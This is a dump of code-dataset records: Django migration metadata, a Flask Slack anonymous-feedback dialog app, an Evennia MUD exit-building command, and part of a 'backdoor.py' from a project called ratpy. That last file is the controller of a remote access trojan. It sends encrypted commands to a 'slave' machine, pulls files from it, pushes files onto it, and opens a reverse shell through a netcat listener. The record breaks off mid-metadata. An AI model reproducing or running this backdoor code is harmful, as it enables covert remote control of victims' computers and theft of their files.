{"api_name": "django.db.migrations", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.TimeField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 33, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.deletion", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.models.deletion", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "django.db.models.deletion", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.db.models.Model", "line_number": 41, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 43, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 46, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 46, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 47, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 47, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 48, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 48, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 49, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 49, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 50, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 50, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 51, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 51, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 52, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 53, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 53, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 54, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 54, "usage_type": "name"}, {"api_name": "django.db.models.deletion", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 54, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 55, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 55, "usage_type": "name"}, {"api_name": "django.db.models.deletion", "line_number": 55, "usage_type": "attribute"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 55, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 55, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 60, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "27296483076", "text": "#!flask/bin/python\nimport json\nfrom flask import Flask, Response, request, jsonify, make_response\nimport requests\nfrom flaskrun import flaskrun\nfrom config import SlackConfig \nfrom slacker import Slacker\nimport os\nimport traceback\n\napplication = Flask(__name__)\n\nlogWebhookUrl = SlackConfig.LOG_CHANNEL_WEBHOOK\nretroWebhookUrl = SlackConfig.RETRO_CHANNEL_WEBHOOK\n\n#Sends a message to the slack channel\ndef sendSlackChannel(logWebhookUrl, message):\n data = {\"text\": message} #json.loads(data)\n response = requests.post(logWebhookUrl, data=json.dumps(data), headers={'Content-Type': 'application/json'})\n return \"Sonuc : \" + str(response.status_code) + ' -- ' + response.text\n\n#Sends a message to the slack retrobox channel\ndef sendRetroMessage(logWebhookUrl, userName, messageDetail, username_allowed = \"no\" ) :\n api_url = '\thttps://slack.com/api/chat.postMessage'\n\n data = ''\n with open('message.txt', encoding='utf-8') as json_file:\n data = json.load(json_file)\n if username_allowed == \"yes\":\n json_format = json.dumps(data).replace(\"#user_name\", userName).replace(\"#message_detail\", messageDetail)\n else :\n json_format = json.dumps(data).replace(\"#user_name\", \"Anonymous\").replace(\"#message_detail\", messageDetail)\n\n res = requests.post(logWebhookUrl, data=json_format, headers={'Content-Type': 'application/json'})\n return str(res) + str(res.content)\n\n\n@application.route('/interactivePost', methods=['POST'])\ndef interactivePost() :\n try :\n payload = json.loads(request.form[\"payload\"])\n\n message = ':mega: *Info:* retro command called. *Command: *' + str(payload[\"type\"])+ '```' + str(request.form) + '```'\n sendSlackChannel(logWebhookUrl, message)\n\n # Komut ilk defa çalıştırılıyorsa \n if payload[\"type\"] == \"shortcut\" : \n api_url = 'https://slack.com/api/dialog.open'\n\n trigger_id = request.form.get('trigger_id')\n\n dialog = {\n \"callback_id\": \"ryde-46e2b0\",\n \"title\": \"Retro Box\",\n \"submit_label\": \"Request\",\n \"notify_on_cancel\": True,\n \"state\": \"first_place\",\n \"elements\": [\n {\n \"type\": \"textarea\",\n \"label\": \"Anything you can throw in our retro box?\",\n \"name\": \"comment\",\n \"placeholder\": \"Let me think...\",\n \"hint\" : \"Allons-y...\"\n },\n {\n \"type\": \"select\",\n \"label\": \"How do you feel?\",\n \"name\": \"feeling\",\n \"value\": \"no_comment\",\n \"hint\" : \"I wish you to be happy....\",\n \"options\": [\n {\n \"label\": \"I feel very good\",\n \"value\": \"so_good\"\n },\n {\n \"label\": \"I feel good\",\n \"value\": \"good\"\n },\n {\n \"label\": \"So so\",\n \"value\": \"so_so\"\n },{\n \"label\": \"I feel bad.\",\n \"value\": \"bad\"\n },\n {\n \"label\": \"No coomment\",\n \"value\": \"no_comment\"\n } \n ]\n },\n {\n \"type\": \"select\",\n \"label\": \"Would you like us to post your username?\",\n \"name\": \"username_allowed\",\n \"value\": \"no\",\n \"hint\" : \"If you say no, everything is between us...\",\n \"options\": [\n {\n \"label\": \"Yes\",\n \"value\": \"yes\"\n },\n {\n \"label\": \"No\",\n \"value\": \"no\"\n }\n ]\n }\n ]\n }\n\n api_data = {\n \"token\": SlackConfig.TOKEN,\n \"trigger_id\": payload[\"trigger_id\"],\n \"dialog\": json.dumps(dialog)\n }\n\n res = requests.post(api_url, data=api_data)\n message = ':mega: *res:* ' + str(res.content)\n sendSlackChannel(logWebhookUrl, message)\n\n elif payload[\"type\"] == \"dialog_submission\" : \n sendRetroMessage(logWebhookUrl, str(payload[\"user\"][\"name\"]), str(payload[\"submission\"][\"comment\"]), str(payload[\"submission\"][\"username_allowed\"]))\n sendRetroMessage(retroWebhookUrl, str(payload[\"user\"][\"name\"]), str(payload[\"submission\"][\"comment\"]), str(payload[\"submission\"][\"username_allowed\"]))\n\n\n elif payload[\"type\"] == \"dialog_cancellation\" : \n message = \"CANCELLATION\"\n sendSlackChannel(logWebhookUrl, message)\n\n else :\n message = \"NOT UNDERSTOOD\"\n sendSlackChannel(logWebhookUrl, message)\n\n\n except Exception as error:\n return make_response(\"Error!\" + str(error), 200)\n\n return make_response(\"\", 200)\n\n\nif __name__ == '__main__':\n flaskRun(application)", "repo_name": "sevvalkahraman/slack-open-dialog-with-python", "sub_path": "application.py", "file_name": "application.py", "file_ext": "py", "file_size_in_byte": 5585, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "config.SlackConfig.LOG_CHANNEL_WEBHOOK", "line_number": 13, "usage_type": "attribute"}, {"api_name": "config.SlackConfig", "line_number": 13, "usage_type": "name"}, {"api_name": "config.SlackConfig.RETRO_CHANNEL_WEBHOOK", "line_number": 14, "usage_type": "attribute"}, {"api_name": "config.SlackConfig", "line_number": 14, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 19, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 19, "usage_type": "call"}, {"api_name": "json.load", "line_number": 28, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 30, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 34, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "config.SlackConfig.TOKEN", "line_number": 115, "usage_type": "attribute"}, {"api_name": "config.SlackConfig", "line_number": 115, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 117, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 120, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "29850008708", "text": "# -*- coding: UTF-8 -*-\nfrom commands.command import MuxCommand\nfrom evennia.utils import search\nfrom evennia.utils import create\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom evennia.objects.models import ObjectDB\nfrom evennia.utils.utils import inherits_from, class_from_module\n\n\nclass CmdExit(MuxCommand):\n \"\"\"\n Simple destinations are stored on the room in its 'exits' attribute in a dictionary.\n All simple exits on the room use the same attribute, compared to object-based exits,\n which create a new database object. Simple exits use much less database space.\n Actual exit objects superceed simple exits in every way.\n Usage:\n |w<|ydirection|w>[|glist of switches|w] [|ydestination|w]|n\n Options:\n |g/add|n [name starts with or alias] adds simple exit to destination in the given direction.\n |g/del|n removes simple exit in given direction.\n |g/tun|n adds simple exit from destination in opposite direction.\n |g/both|n adds simple exit to destination and back in opposite direction.\n |g/none|n removes simple exit to destination and back in opposite direction.\n |g/new|n [name;alias;...] creates a new room of given name as destination.\n |g/go|n after any above operations, move to destination.\n |g/show|n shows room exit information and back exit from .\n\n Options combine in some combinations e.g. west/none/go would remove the exits\n into and out of the room in the given direction, then take you to the destination room.\n\n This command never deletes rooms, but can create them in a simple fashion when needed.\n \"\"\"\n locks = 'cmd:all()'\n arg_regex = r'^/|\\s|$'\n help_category = 'Travel'\n auto_help = True\n account_caller = True\n\n def func(self):\n \"\"\"Command for all simple exit directions.\"\"\"\n you = self.character\n loc = you.location\n account = self.account\n cmd = self.cmdstring\n switches = self.switches\n args = self.args.strip()\n direction = self.aliases[0]\n dest = None # Hopeful destination for exits and moving to.\n switches = self.switches\n switches_list = [u'add', u'del', u'tun', u'both', u'none', u'new', u'go', u'show']\n\n if switches and not all(x in switches_list for x in switches):\n account.msg(\"You used an unknown switch for |530%s|n. Use only these: |g/%s\" %\n (self.key, \"|n, |g/\".join(switches_list)))\n return\n\n def new_room(room_name):\n \"\"\"\n print(\"-----\")\n print(\"New Room creation details.\")\n print(\"Name: %s\" % room['name'])\n print(\"Alises: %s\" % room['aliases'])\n print(\"Type: %s\" % typeclass)\n print(\"Lock: %s\" % lockstring)\n print(\"=====\")\n \"\"\"\n if not account.check_permstring('Builders'):\n you.msg(\"You must have |wBuilders|n or higher access to create a new room.\")\n return None\n\n name, aliases = '', []\n if ';' in room_name: # Parse aliases out of room_name.\n name, aliases = room_name.strip().split(';', 1)\n aliases = aliases.split(';')\n else: # No aliases provided; aliases remain empty.\n name = room_name.strip()\n\n typeclass = settings.BASE_ROOM_TYPECLASS\n room = {'name': name, 'aliases': aliases}\n lockstring = \"control:pid({0}) or perm(Immortals); delete:pid({0})\" \\\n \" or perm(Wizards); edit:pid({0}) or perm(Wizards); get:false()\"\\\n .format(account.id)\n r = create.create_object(typeclass, room['name'], aliases=room['aliases'], report_to=you)\n r.locks.add(lockstring)\n alias_string = room['aliases']\n if r.aliases.all():\n alias_string = \" |w(|c%s|w)|n\" % \"|n, |c\".join(r.aliases.all())\n account.msg(\"|gCreated room %s%s of type |m%s.\" % (r.get_display_name(account), alias_string, typeclass))\n return r or None\n\n def find_by_name(search):\n search = search.strip().split(';', 1)[0]\n keyquery = Q(db_key__istartswith=search)\n aliasquery = Q(db_tags__db_key__istartswith=search,\n db_tags__db_tagtype__iexact='alias')\n\n results = ObjectDB.objects.filter(keyquery | aliasquery).distinct()\n nresults = results.count()\n\n if nresults: # convert multiple results to typeclasses.\n results = [result for result in results]\n room_typeclass = settings.BASE_ROOM_TYPECLASS # Narrow results to only room types.\n results = [obj for obj in results if inherits_from(obj, room_typeclass)]\n return results\n\n def add(you_add, loc_add, ways_add):\n \"\"\"\"Command for adding an exit - checks location and permissions.\"\"\"\n results = find_by_name(self.args)\n if not results:\n account.msg('Destination \"|r%s|n\" was not valid.' % args)\n result = None\n else:\n result = results[0] # Arbitrarily select the first result of usually only one.\n ways_add[direction] = result\n you_add.msg(\"|ySearch found|n (%s)\" % result.get_display_name(you) if result else None)\n if not result:\n account.msg('Destination \"|r%s|n\" was not valid.' % args)\n return None\n if ways_add[direction]:\n if loc_add.access(you_add, 'edit'):\n if ways_add[direction].access(you_add, 'control'):\n loc_add.db.exits = ways_add\n you_add.msg(\"|gAdded|n exit |lc%s|lt|530%s|n|le from %s to %s.\" %\n (self.key, self.key, loc_add.get_display_name(account),\n ways_add[direction].get_display_name(account)))\n else:\n you_add.msg(\"You do not control the destination, so can not connect an exit to it.\")\n else:\n you_add.msg(\"You have no permission to edit here.\")\n return ways_add[direction]\n account.msg(\"You typed command (|y%s|n), switches (|%s|n), with no valid destination.\" %\n (cmd, switches))\n account.msg('Destination \"|r%s|n\" was not valid.' % args)\n return None\n\n def back_dir(x):\n return {'n': 's', 's': 'n', 'e': 'w', 'w': 'e',\n 'nw': 'se', 'se': 'nw', 'ne': 'sw',\n 'sw': 'ne', 'u': 'd', 'd': 'u'}[x]\n\n def long_dir(x):\n return {'n': 'north', 's': 'south', 'e': 'east', 'w': 'west', 'nw': 'northwest', 'se': 'southeast',\n 'ne': 'northeast', 'sw': 'southwest', 'u': 'up', 'd': 'down'}[x]\n\n def tun(you_tun, loc_tun, dest_tun, dir_tun):\n \"\"\"Command for tunneling an exit back - checks existing exits, location and permissions.\"\"\"\n tun_ways = dest.db.exits or {}\n tun_way = tun_ways.get(back_dir(dir_tun))\n if tun_way: # Is the direction in the room's exit dictionary?\n return None\n else:\n tun_ways[back_dir(dir_tun)] = loc_tun\n if dest_tun.access(you_tun, 'control'):\n dest_tun.db.exits = tun_ways\n you_tun.msg(\"|gAdded|n exit |530%s|n back from %s to %s.\" %\n (long_dir(back_dir(dir_tun)), dest_tun.get_display_name(account),\n loc_tun.get_display_name(account)))\n else:\n you_tun.msg(\"You do not control the destination, so can not connect an exit to it.\")\n\n if switches: # Provide messages giving feedback for Tria\n switch_list = '/' + '/'.join(switches)\n if args:\n account.msg(\"Showing direction, switches, destination: |y%s|g%s |y%s\" %\n (cmd, switch_list, args))\n else:\n account.msg(\"Showing direction and switches: |y%s|g%s|n, but no destination was given.\" %\n (cmd, switch_list))\n if 'add' in switches or 'new' in switches or 'both' in switches:\n account.msg(\"Without a destination, |g/add|n or |g/new|n can not be done.\")\n else:\n if args:\n account.msg(\"Showing direction and destination: |y%s %s|n (No switches were provided - nothing to do.)\"\n % (cmd, args))\n if 'new' in switches and not args:\n you.msg(\"|g%s|r/new|n requires a destination room to be given, e.g. |g%s/new |yWilderness\" % (cmd, cmd))\n return\n if 'add' in switches or 'both' in switches:\n if not args:\n you.msg(\"|g%s|r/add|n requires a destination room to be given, e.g. |g%s/add |yWilderness\" %\n (cmd, cmd))\n return # No further action, not even check for /go.\n if 'del' in switches or 'none' in switches: # Can't do both!\n you.msg(\"|rThose switches are mutually exclusive; do not do both!\")\n return # No further action, not even check for /go.\n if you.location.db.exits: # Does an 'exits' attribute exist (and not None or False)?\n ways = loc.db.exits\n way = ways.get(direction)\n if way: # Direction in the room's exit dictionary should know room.\n dest = way\n if 'del' in switches or 'none' in switches:\n dest = way\n tunnel_way = back_dir(direction)\n tunnel_ways = dest.db.exits\n if loc.access(you, 'edit'):\n del(ways[direction])\n loc.db.exits = ways\n you.msg(\"|rRemoved|n exit |530%s|n from %s.\" % (self.key, loc.get_display_name(account)))\n if ('tun' in switches or 'none' in switches) and tunnel_ways:\n if dest.access(you, 'edit'):\n del(tunnel_ways[tunnel_way])\n dest.db.exits = tunnel_ways\n you.msg(\"|rRemoved|n exit |530%s|n from %s.\" %\n (long_dir(tunnel_way), dest.get_display_name(account)))\n else:\n you.msg(\"You have no permission to edit here.\")\n elif 'add' in switches or 'both' in switches:\n if loc.access(you, 'edit'):\n you.msg(\"Exit |530%s|n to %s leading to %s already exists here.\" %\n (self.key, loc.get_display_name(account), dest.get_display_name(account)))\n else:\n you.msg(\"You have no permission to edit here.\")\n if ('tun' in switches or 'both' in switches) and not ('del' in switches or 'none' in switches):\n tun(you, loc, dest, direction) # Add is done, now see if tun can be done.\n if 'new' in switches:\n you.msg(\"Can't make a new room, already going to %s.\" % dest)\n if 'go' in switches or not switches:\n if 'show' in switches:\n you.msg(\"Ignoring |g/show|n switch; you must use it separately.\")\n you.ndb.moving_to = long_dir(direction)\n you.ndb.moving_from = long_dir(back_dir(direction))\n you.ndb.exit_used = direction\n you.move_to(dest)\n else: # No direction in the room's exit dictionary goes that way. Or direction goes to None.\n if 'new' in switches:\n dest = new_room(self.args)\n if 'add' in switches or 'both' in switches:\n add(you, loc, ways)\n elif 'del' in switches or 'none' in switches:\n if direction in ways:\n del(ways[direction])\n you.msg(\"Exit |530%s|n was not valid. (|rremoved|n)\" % self.key)\n else:\n you.msg(\"Exit |530%s|n does not exist here.\" % self.key)\n if 'tun' in switches or 'both' in switches:\n dest = ways.get(direction)\n if dest:\n tun(you, loc, dest, direction) # Add is done, now see if tun can be done.\n else:\n if self.args:\n you.msg(\"|ySearching|n for \\\"%s\\\" to the %s.\" % (self.args, self.key))\n dest = find_by_name(self.args)\n if dest:\n dest = dest[0]\n you.msg(\"|gFound|n \\\"%s\\\" to the %s.\" % (dest, self.key))\n tun(you, loc, dest, direction) # Add not done, but see if tun can be done.\n else:\n you.msg(\n \"|rDestination room not found|n \\\"{0:s}\\\" to the {1:s} when searching by: {2:s}.\"\n .format(dest, self.key, self.args))\n else:\n you.msg(\"|yYou must supply a name or alias of the target room.|n\")\n if 'go' in switches:\n if 'show' in switches:\n you.msg(\"Ignoring |g/show|n switch; you must use it separately.\")\n if 'add' in switches or 'both' in switches:\n you.ndb.moving_to = long_dir(direction)\n you.ndb.moving_from = long_dir(back_dir(direction))\n you.ndb.exit_used = direction\n you.move_to(ways[direction])\n else:\n if ('tun' in switches or 'both' in switches) and dest:\n if 'show' in switches:\n you.msg(\"Ignoring |g/show|n switch; you must use it separately.\")\n you.ndb.moving_to = long_dir(direction)\n you.ndb.moving_from = long_dir(back_dir(direction))\n you.ndb.exit_used = direction\n you.move_to(dest)\n if not switches:\n if direction in ways:\n del(ways[direction])\n you.msg(\"Exit |530%s|n was not valid. (|rremoved|n)\" % self.key)\n else:\n you.msg(\"You cannot travel %s.\" % self.key)\n else: # No simple exits from this location.\n ways = {}\n way = None\n dest = way\n if 'new' in switches:\n dest = new_room(self.args)\n if 'add' in switches or 'both' in switches:\n dest = add(you, loc, ways)\n elif 'del' in switches or 'none' in switches:\n if 'tun' in switches or 'both' in switches:\n # TODO: If 'tun' option is also used -\n # there is no easy way to find it to delete it.\n pass\n else:\n you.msg(\"No simple exit |530%s|n to delete.\" % self.key)\n if ('tun' in switches or 'both' in switches) and ('del' not in switches and 'none' not in switches):\n if 'add' in switches or 'both' in switches:\n dest = ways[direction]\n tun(you, loc, dest, direction) # Add is done, now see if tun can be done.\n else:\n # TODO: Test - does this only work with 'add' option?\n # It requires a destination, if not.\n pass\n if 'go' in switches and way:\n if 'show' in switches:\n you.msg(\"No simple exits to |g/show|n in this room.\")\n you.ndb.moving_to = long_dir(direction)\n you.ndb.moving_from = long_dir(back_dir(direction))\n you.ndb.exit_used = direction\n you.move_to(dest)\n if not switches:\n you.msg(\"You cannot travel %s.\" % self.key)\n if 'show' in switches and 'go' not in switches:\n if not account.check_permstring('Helpstaff'):\n you.msg(\"You must have |gHelpstaff|n or higher access to use this.\")\n return None\n if you.location.attributes.has('exits'): # Does an 'exits' attribute exist?\n ways = loc.db.exits\n if direction in ways:\n dest = ways[direction] if ways else None\n you.msg(\"|wSimple exits report: %s exist in %s: %s\" %\n (len(ways), you.location.get_display_name(you), ways))\n tunnel_ways = None\n if dest:\n tunnel_ways = dest.db.exits\n if tunnel_ways:\n you.msg(\"|wSimple exit report|n: exists in %s going |530%s|n back to %s.\" %\n (dest.get_display_name(you), long_dir(back_dir(direction)),\n you.location.get_display_name(you)))\n else:\n you.msg(\"No simple exits exist in %s.\" % you.location.get_display_name(you))\n\n\nclass CmdExitNorth(CmdExit):\n __doc__ = CmdExit.__doc__\n key = \"north\"\n aliases = ['n']\n\n\nclass CmdExitNortheast(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'northeast'\n aliases = ['ne']\n\n\nclass CmdExitNorthwest(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'northwest'\n aliases = ['nw']\n\n\nclass CmdExitEast(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'east'\n aliases = ['e']\n\n\nclass CmdExitSouth(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'south'\n aliases = ['s']\n\n\nclass CmdExitSoutheast(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'southeast'\n aliases = ['se']\n\n\nclass CmdExitSouthwest(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'southwest'\n aliases = ['sw']\n\n\nclass CmdExitWest(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'west'\n aliases = ['w']\n\n\nclass CmdExitUp(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'up'\n aliases = ['u']\n\n\nclass CmdExitDown(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'down'\n aliases = ['d']\n", "repo_name": "Pinacolada64/NOW", "sub_path": "commands/exitdirections.py", "file_name": "exitdirections.py", "file_ext": "py", "file_size_in_byte": 18543, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "52", "api": [{"api_name": "commands.command.MuxCommand", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.settings.BASE_ROOM_TYPECLASS", "line_number": 79, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 79, "usage_type": "name"}, {"api_name": "evennia.utils.create.create_object", "line_number": 84, "usage_type": "call"}, {"api_name": "evennia.utils.create", "line_number": 84, "usage_type": "name"}, {"api_name": "evennia.utils.search", "line_number": 93, "usage_type": "name"}, {"api_name": "evennia.utils.search.strip", "line_number": 93, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 94, "usage_type": "call"}, {"api_name": "evennia.utils.search", "line_number": 94, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 95, "usage_type": "call"}, {"api_name": "evennia.utils.search", "line_number": 95, "usage_type": "name"}, {"api_name": "evennia.objects.models.ObjectDB.objects.filter", "line_number": 98, "usage_type": "call"}, {"api_name": "evennia.objects.models.ObjectDB.objects", "line_number": 98, "usage_type": "attribute"}, {"api_name": "evennia.objects.models.ObjectDB", "line_number": 98, "usage_type": "name"}, {"api_name": "django.conf.settings.BASE_ROOM_TYPECLASS", "line_number": 103, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 103, "usage_type": "name"}, {"api_name": "evennia.utils.utils.inherits_from", "line_number": 104, "usage_type": "call"}]} +{"seq_id": "20500579967", "text": "from sys import stderr, exit, stderr\nfrom os import mkdir, listdir, fork, wait\nfrom socket import error as socket_error\nimport os.path\n\nfrom utils.crypto import encrypt, decrypt\nfrom utils.utils import clear\n\ndef get_cmd():\n cmd = \"\"\n while cmd == \"\":\n cmd = input(\"[backdoor_shell] >>> \")\n return cmd\n\n\ndef send_cmd(conn, cmd):\n try:\n cmd = bytes(cmd, 'utf-8')\n crypt_cmd = encrypt(cmd)\n conn.send(crypt_cmd)\n except socket_error:\n stderr.write(\"Error sending command\\n\")\n return conn \n\n\ndef drop_shell(shell_port, status):\n pid = fork()\n if pid == 0:\n clear()\n print(\"\\n[*] Dropping shell on slave machine ...\")\n print(\"[+] Exit netcat sending SIGINT\")\n cmd = \"nc -l \" + str(shell_port)\n _ = call(cmd.split(\" \"))\n else:\n wait()\n return status \n\n\ndef recv_msg(conn, buffer):\n msg = \"\"\n try:\n crypt_msg = conn.recv(buffer)\n msg = decrypt(crypt_msg) \n msg = msg.decode('utf-8')\n except socket_error:\n stderr.write(\"[x] Error receiving response\\n\")\n return conn, msg\n\n\ndef builtin_cmds(conn, cmd, shell_port, status):\n status = 0\n msg = \"\"\n if cmd[:5] == \"shell\":\n cmd += str(shell_port)\n conn = send_cmd(conn, cmd)\n status = drop_shell(shell_port, status)\n elif cmd[:2] == \"ls\":\n conn = send_cmd(conn, cmd)\n conn, msg = recv_msg(conn, 64000)\n elif cmd[:5] == \"clear\":\n clear()\n msg = \"ACK\\n\"\n elif cmd[:4] == \"exit\":\n status = 1\n elif cmd[:2] == \"dl\":\n conn = send_cmd(conn, cmd)\n conn, msg = recv_msg(conn, 64000)\n with open(\"dump/\"+str(cmd)[3:], \"w\") as fp:\n fp.write(msg[3:])\n elif cmd[:2] == \"pl\":\n conn = send_cmd(conn, cmd[:2])\n clear()\n for file in listdir():\n print(file)\n filename = input(\"$ \")\n with open(filename, \"r\") as fp:\n data = fp.read()\n conn = send_cmd(conn, data)\n msg = \"[+] File uploaded to slave machine\"\n elif cmd[:3] == \"cat\":\n filename = cmd[3:]\n conn = send_cmd(conn, cmd)\n conn, msg = recv_msg(conn, 64000)\n else:\n msg = \"[x] Command not found\"\n return conn, status, msg\n\ndef validate_msg(msg):\n slave_ack = msg[:3]\n msg = msg[3:]\n if slave_ack != \"ACK\":\n stderr.write(\"[x] Slave did not acknowledge the command\\n\")\n elif msg[:3] == \"404\":\n print(\"Error message from slave: %s\" % (msg[3:]))\n else:\n print(\"%s\\n\" % msg)\n\n\ndef display_response(conn, msg):\n if msg == \"\":\n conn, msg = recv_msg(conn, 1024)\n validate_msg(msg)\n return conn\n\n\ndef cmd_shell(conn, shell_port, status):\n while status != 1:\n cmd = get_cmd()\n conn, status, msg = builtin_cmds(conn, cmd, shell_port, status)\n conn = display_response(conn, msg)\n\n\ndef backdoor_run(conn, shell_port):\n print(\"\\n[+] Running backdoor...\")\n if not os.path.isdir(\"dump\"):\n mkdir(\"dump\")\n status = 0\n cmd_shell(conn, shell_port, status)\n", "repo_name": "rodfer0x80/ratpy", "sub_path": "src/master/tools/backdoor.py", "file_name": "backdoor.py", "file_ext": "py", "file_size_in_byte": 3086, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "utils.crypto.encrypt", "line_number": 19, "usage_type": "call"}, {"api_name": "socket.error", "line_number": 21, "usage_type": "name"}, {"api_name": "sys.stderr.write", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.stderr", 